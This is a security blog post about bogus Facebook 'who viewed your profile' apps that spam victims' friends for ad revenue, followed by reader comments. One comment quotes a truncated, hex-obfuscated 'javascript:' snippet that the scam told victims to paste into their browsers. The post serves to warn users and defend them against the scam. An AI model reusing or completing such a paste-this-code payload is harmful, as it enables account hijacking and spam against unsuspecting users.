Who’s checking your Facebook profile? Scammers.

Yet another variation on a Spam theme for Facebook to deal with tonight. I have identified at least 25 different copies of the same rogue app with names such as peeppeep-pro, profile-check-online and stalk-my-profile
    
A wave of applications have been published that promise to reveal the truth about which of your friends are viewing your Facebook profile. The promise is worthless and the apps are bogus.
   

Rogue App wall post

Rogue App wall post


 
  
Facebook users may notice wall posts or receive notifications from their friends, unwitting victims all, encouraging them to install the rogue app, along with bogus assurances on its reliability.
  
 

Rogue App "Configuration" screen

Rogue App "Configuration" screen


 
 
 
The app itself is designed to look convincing enough, but none of the many “Continue” buttons it offers will activate some under-the-counter profile checking functionality, they will just push you into another Facebook app earning the scammer advertising revenue in the process.
  
 

Notifications from two versions of the rogue app

Notifications from two versions of the rogue app


 
 
 
In an interesting twist on the now familiar theme, at least one version of the rogue app will create a photo montage of all the infected user’s friends, tag it so that they all receive notifications and then post the photo.
   

Bogus photo montage from rogue app

Bogus photo montage from rogue app


 
  
These changes in scam tactics are clearly designed to overcome the changes that Facebook made recently to application functionality, including removing the ability for applications to send notifications directly.
   
I can see that Facebook are actively combating these applications as they are posted, even on a Sunday evening, which is commendable but… I said it first back in February 2009, isn’t it time Facebook at least had a review of their application publishing policy? The idea was dismissed back then, but now that these things are becoming a regular occurrence there must be a tremendous burden being placed on the incident response handlers at Facebook that could be better channeled into an application vetting process.
   
For now though, just don’t click the links, they will disappear from your streams as Facebook remove the offending apps. There is no officially sanctioned Facebook functionality that will allow you to view who has been checking your profile.
 
A quick look in your Photo stream will show you how widespread the victims of this scam are:
 
Screenshot of my own Photo stream

Screenshot of my own Photo stream

35 thoughts on “Who’s checking your Facebook profile? Scammers.

  1. Pingback: It's Time For Facebook - Or, At Least, Someone - To Vet Third-Party Applications

  2. Pingback: It's Time For Facebook - Or, At Least, Someone - To Vet Third-Party Applications dougv.com « Doug Vanderweide

  3. Pingback: Osama lives again on Facebook | Simply Security

  4. Pingback: Chcesz dostać maila, że zerwali? Facebook już Ci w tym nie pomoże. - miedzybitami - Site Home - TechNet Blogs

  5. Liz Nerdyknowitall

    I’m tired of having to play Mother Hen to my friends and family about these kinds of things. I wish FB would just do away with the app stuff entirely – they are all garbage and way too many of them are questionable from a security standpoint.

    As far as the legitimate-but-annoying apps like Farmville and Mafia Wars – if people want to play free web-based games there are plenty of safe websites for that.

    Reply
  6. Myck

    I rarely use any apps on Facebook but somehow managed to get caught up in this. It even puts your photo in the collage, similar to above and then emails people you’re friends with.
    Only found out when out of nowhere, I started getting odd comments and messages from people that the app had mailed. Dont know how many people it mailed or what it said but Im sure someone would have said something if it was bad. It cemented one thing in my mind, Im done with facebook. I tried to contact them about this (‘report this’ is a joke), eventually you get directed to a form that goes to? –No Idea
    and is this answered? –Never
    Absolutely sick of it now, have removed all info possible and changed anything remaining (name, address etc). It wouldnt allow me to remove all or close the account, so I just did it gradually.
    I know theres no way of completey wiping all data but Im not going to make it easy for them either.
    F***FB

    Reply
  7. Pingback: Traditional AV Testing: File Under 'Irrelevant' | Business Computing World

  8. Seeker

    Okay, I got this email from a close friend of mine which said “SEE WHO’S VIEWING YOUR PROFILE NOW!..” and all that. I clicked on it (how stupid?) and it brought me to a facebook page which said become a fan. Which I did. Then it said paste the following code into a web browser (how goddamned stupid??).Notihng seemed to happen. Atleast I couldnt figure out anything.
    Anyone out there knows something about this? Should I be worried??

    javascript:var _0x7f7d=[“\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C”,”\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x78\x44″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,”\x3C\x61\x20\x69\x64\x3D\x22\x53\x75\x67\x67\x65\x73\x74\x22\x20\x68\

    Reply
  9. Pingback: Facebook users warned over stalk-my-profile scam | WorldWar-E™

  10. Pingback: Who’s checking your Facebook profile? Scammers. | Business Computing World

  11. Pingback: Facebook Roundup: FTC, Design Changes, Nestlé, URLs and More

  12. Pingback: Facebook Blocked Checking-My-Profile Scam :: Facebook Wall

  13. Pingback: Episode 90 – What’s in your career plan? | InfoSec Daily

  14. Matt Murphy

    I first became aware of this app about 10 days ago when I was invited by both my wife and my sister in law. I noticed that it was automatically posting on my facebook wall with comments that I never made. Nothing untoward, just general crap like “Matt Murphy likes this, it work’s!”

    I also noticed that it was making a very generic montage of friends, seven of which I knew hadn’t been on facebook for weeks and one that I’d only just sent a friend request to ( and had’t replied yet) so I thought something was a bit sus.

    Getting rid of it? easy but frustrating, as the app keeps making new posts while you are deleting the last but this is how I got rid of it.

    1- delete the app from applications page (do this prior to deleting posts or it just adds more posts)

    2- go to your profile and delete all references to the app

    3- go to your photos and delete all montages and the albums it creates.

    4- Warn everyone in your friends list and ask them to warn everyone they know.

    5 Do a search for the person who originated the app (go to the home page you got it from and go to its wall, the developer will be listed. Then annoy the crap out of them, let your friends know about the developer, get them to do the same, then report them.

    Hope this helps, but to ensure that an app is genuine, and actually sent from one of your friends, IM them or send an email for them to confirm. or just dont use apps>

    Reply
  15. Pingback: Trend Micro waarschuwt voor schadelijke Facebook-applicatie | Computertaal

  16. Pingback: Scary ‘Stalker Apps’ Silenced by Facebook Due to Security Concerns | Everything's Social

  17. Pingback: SearchCap: The Day In Search, March 17, 2010

  18. James Wallis Martin

    In order to prevent any spam or hacking, simply don’t use any of the Facebook apps. If you are concerned about an app filling your inbox, turn off the app in your settings.

    I don’t see the big deal. If you want to be anti-social and not reconnect with your friends from around the world, that is your choice, but I am sure your friends will miss you. Walking away means the spammers have beaten you. Just turn off all the apps. If Facebook doesn’t constantly change and keep up with the changes to social networking they will become antiquated. The world is changing constantly, adapt or fall behind and the pace of change is only going to get faster.

    Reply
  19. Pingback: Facebook users warned over stalk-my-profile scam | Computing

  20. africantrader

    I with “onobrahs”. I so rarely check FB anymore. The apps are especially annoying. All (most) your friends telling you what kind of animal, or flower or house or whatever they are.

    Reply
  21. onobrahs

    Facebook is losing me. Between the constant changes that make it less and less user-friendly and the stupid farm games that trash my inbox, and now this. I only check it about once a week now, and I may just cancel out entirely. Why bother? It’s value is now antiquated.

    Reply
  22. Pingback: Trend Micro waarschuwt voor schadelijke Facebook-applicatie | Beveiligingslog

  23. Pingback: Facebook users succumb to addon scam | Consider IT

  24. Pingback: Iedereen veilig online » Blog Archive » Wie heeft je Facebook profiel bekeken?

  25. Pingback: “Who’s Stalking My Profile?” on Facebook Doesn’t Work » TECH BOTTLE http://tbottle.com

  26. Pingback: It’s Time For Facebook – Or, At Least, Someone – To Vet Third-Party Applications « dougv.com « The Web home of Doug Vanderweide

  27. Pingback: Value of “who is stalking me” functionality – RainbowInWater

    1. Rik Ferguson Post author

      I would imagine whichever app you activated has already been removed by Facebook, they were working the late shift on this one! I would suggest deleting any photo the app posted on your profile and not falling for it again :)

      Reply
  28. Pingback: Scam “Who’s checking your Facebook profile?” | WebSegura.Net

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>